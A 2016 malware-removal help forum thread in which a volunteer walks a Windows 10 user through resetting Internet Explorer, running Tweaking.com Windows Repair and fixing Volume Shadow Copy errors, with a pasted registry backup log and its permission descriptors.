I ran the FRST with the file you provided UNFORTUNATELY I did not run it with ADMIN (I apologize)

 

The machine automatically rebooted and the microphone problem seems to be solved.

Also regsvr32 is not running.

 

However IE 11 is extremely slow (was unable to update JAVA) and I was unable to launch Edge. Using Chrome to post this.

 

Attached is fixlog.txt 

 

I'll wait for further instructions

Thanks again

 

 

Attached Files



#4 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 09 August 2016 - 12:42 PM

Reset Internet Explorer:
Menu > Tools > Internet Options > Advanced Tab.
Click the Reset button on the bottom of the pane.
Click the Apply button.
Close IE.


Clean the Internet Explorer Cache.
https://kb.wisc.edu/page.php?id=15141
=

Restart the computer normally when done.

How is it now?

#5 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 09 August 2016 - 01:27 PM

Reset done

 

Cleared cache (FYI https://kb.wisc.edu/page.php?id=15141 gives a Page not found)

 

IE is a little better 

 

Cannot download java (select "Agree and start free download" button) and page just reloads

 

Windows Key and left click on Start button do not work, Edge Icon is gone from the task bar.

 

Microphone is still working and no regsvr32



#6 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 10 August 2016 - 07:29 AM

Clean your Java cache.
https://www.java.com/en/download/help/plugin_cache.xml

Use Firefox to update Java.

===

Please Download Tweaking.com - Windows Repair from Here
[list]
  • Install and then run the program
  • Execute the instructions on Step 1 Important
  • Click Next on Step 2 Optional, do the Pre Scan skip Step 3 and 4 Optional for now.
  • On Step 5 Backup System Restore Do a Registry backup. When you have completed this click Next
  • Click Repairs - Open Repairs in the bottom right corner
  • Uncheck the All repair button then select just the item(s) listed below

  • 07 - Repair Internet Explorer
    11 - Repair Start Menu Icons Removed by Infections
    12 - Repair Icons
    20 - Repair Windows Sidebar/Gadgets
    22 - Repair Windows Snipping tool
    28.01 - Repair Windows 8/10 Apps Store
    28.02 - Repair Windows 8/10 Apps Store (Completely Reset Apps Store)
    29 - Repair Windows 8/10 Component Store
    30 - Repair Windows 8/10 COM+ Unmarshalers
    33 - Repair Performance Counters
    
  • Click the Start button and let the process run to completion. Copy any error messages into Notepad, Save it on your Desktop. ( Reboot if asked to do so)
  • Please copy and paste the Contents of this file on your next reply.

  • ===


#7 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 10 August 2016 - 02:26 PM

I wanted to check with you before proceeding I got an error in step 5 backing up the registry

"The last scheduled backup had errors or failed"

Backup Location C:\regBackup\Greg-hp\8.10.2016_3.06.23pm

I ran it twice and got the same result

 

There is a file named dos_restore in the directory file type Windows Command script

The following is a copy and paste of the 3  txt files in that directory

 

 

Backup_info

 

Computer: GREG-HP (Windows 10 Home (64-bit) 10.0.10586 )
Windows Repair Auto Backup
Total Size: 163.91 MB
 
LOG_Backup
[8/10/2016 - 3:06:23 PM] System Variables
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] Use Fallback Backup Method: 1 (0 = No, 1 = Yes)
[8/10/2016 - 3:06:23 PM] VSS exe To Use: vss_7_8_2008_2012_64.exe
[8/10/2016 - 3:06:23 PM] Windows Drive: C:
[8/10/2016 - 3:06:23 PM] Windows Folder: WINDOWS
[8/10/2016 - 3:06:23 PM] Windows Path: C:\WINDOWS
[8/10/2016 - 3:06:23 PM] Registry File Location: C:\WINDOWS\System32\Config
[8/10/2016 - 3:06:23 PM] Current Profile: C:\Users\Greg Main Acct
[8/10/2016 - 3:06:23 PM] Current Profile SID: S-1-5-21-56867686-1103405722-4171089578-1004
[8/10/2016 - 3:06:23 PM] Current Profile Classes: S-1-5-21-56867686-1103405722-4171089578-1004_Classes
[8/10/2016 - 3:06:23 PM] Profiles Location: C:\Users
[8/10/2016 - 3:06:23 PM] Profiles Location 2: C:\WINDOWS\ServiceProfiles
[8/10/2016 - 3:06:23 PM] Local Settings AppData: AppData\Local
[8/10/2016 - 3:06:23 PM] Computer Name: GREG-HP
[8/10/2016 - 3:06:23 PM] OS: Windows 10 Home (64-bit)
[8/10/2016 - 3:06:23 PM] OS Architecture: 64-bit
[8/10/2016 - 3:06:23 PM] OS Version: 10.0.10586
[8/10/2016 - 3:06:23 PM] OS Service Pack: 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Backup Location: C:\RegBackup\
 
[8/10/2016 - 3:06:23 PM] Silent command given, program will close after backup.
 
[8/10/2016 - 3:06:23 PM] Auto Delete Old Backups Enabled, Working...
[8/10/2016 - 3:06:23 PM] Delete backups 7 Days or older. Keep at least 5 Backups.
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Starting Backup...
 
[8/10/2016 - 3:06:23 PM] Files To Backup: 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\components
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\drivers
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\default
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\sam
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\security
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\software
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\System32\Config\system
[8/10/2016 - 3:06:23 PM] C:\Users\Default\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\DefaultAppPool\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg Main Acct\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\Users\LogMeInRemoteUser\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat
[8/10/2016 - 3:06:23 PM] C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Backing Up Registry Files Security Descriptors (SDDL): 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] "\\?\C:\Users\Default\ntuser.dat",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\Default\ntuser.dat.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat.old",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat.old",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\System32\Config\components",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\components.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\default",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\default.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\drivers",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\drivers.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\sam",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\sam.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:23 PM] Backing Up Files: 
[8/10/2016 - 3:06:23 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:23 PM] Using Fallback Backup Method.
 
[8/10/2016 - 3:06:23 PM] Backing Up File: C:\WINDOWS\System32\Config\components
[8/10/2016 - 3:06:24 PM] Result: Successful (34.63 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\components
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\drivers
[8/10/2016 - 3:06:24 PM] Result: Successful (5.10 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\drivers
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\default
[8/10/2016 - 3:06:24 PM] Result: Successful (364.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\default
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\sam
[8/10/2016 - 3:06:24 PM] Result: Successful (64.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\sam
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\security
[8/10/2016 - 3:06:24 PM] Result: Successful (28.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\security
 
[8/10/2016 - 3:06:24 PM] Backing Up File: C:\WINDOWS\System32\Config\software
[8/10/2016 - 3:06:25 PM] Result: Successful (93.04 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\software
 
[8/10/2016 - 3:06:25 PM] Backing Up File: C:\WINDOWS\System32\Config\system
[8/10/2016 - 3:06:26 PM] Result: Successful (15.80 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\System32\Config\system
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Default\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (256.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Default\ntuser.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\DefaultAppPool\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (256.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\DefaultAppPool\ntuser.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (8.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Failed - Error: -1 (API Reg Save Failed (), Tried File Copy, File In use, Cannot copy.)
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (7.75 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg Main Acct\ntuser.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (944.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Greg Main Acct\ntuser.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:26 PM] Result: Successful (3.35 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:26 PM] Backing Up File: C:\Users\LogMeInRemoteUser\ntuser.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (1.75 MB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\LogMeInRemoteUser\ntuser.dat
 
[8/10/2016 - 3:06:27 PM] Backing Up File: C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (256.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat
 
[8/10/2016 - 3:06:27 PM] Backing Up File: C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (180.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\ServiceProfiles\LocalService\ntuser.dat
 
[8/10/2016 - 3:06:27 PM] Backing Up File: C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat
[8/10/2016 - 3:06:27 PM] Result: Successful (180.00 KB) - C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\C\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat
 
[8/10/2016 - 3:06:27 PM] Total Size: 163.91 MB
 
[8/10/2016 - 3:06:27 PM] --------------------------------------------------------------------------------
 
[8/10/2016 - 3:06:27 PM] Creating DOS restore bat file for use in the Windows Recovery Console: 
[8/10/2016 - 3:06:27 PM] --------------------------------------------------------------------------------
[8/10/2016 - 3:06:27 PM] Already Exists: C:\WINDOWS\tweaking.com-regbackup-GREG-HP-Windows-10-Home-(64-bit).dat for use in the dos_restore.cmd file
[8/10/2016 - 3:06:27 PM] Done: C:\RegBackup\GREG-HP\8.10.2016_3.06.23-PM\dos_restore.cmd
[8/10/2016 - 3:06:27 PM] --------------------------------------------------------------------------------
 
 
SDDL
"\\?\C:\Users\Default\ntuser.dat",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\Default\ntuser.dat.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\DefaultAppPool\ntuser.dat.old",1,"O:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415G:S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg Main Acct\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:SYG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat.old",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat.old",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\System32\Config\components",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\components.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\default",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\default.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\drivers",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\drivers.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\sam",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\sam.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
 
 
 


#8 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 11 August 2016 - 07:06 AM

Your system repair is corrupted.
This program will recreate the correct registry setting and re-register all VSS components. Please download one of the below programs to fix your problem:

Operating system 32 or 64 bit.

VSSfix 32bit
http://updates.macrium.com/reflect/utilities/vssfix.exe

VSSfix 64bit
http://updates.macrium.com/reflect/utilities/vssfixx64.exe

You can right click the exe file and run as Administrator in normal mode and see if that solves the problem. If not try running in Safe Mode.
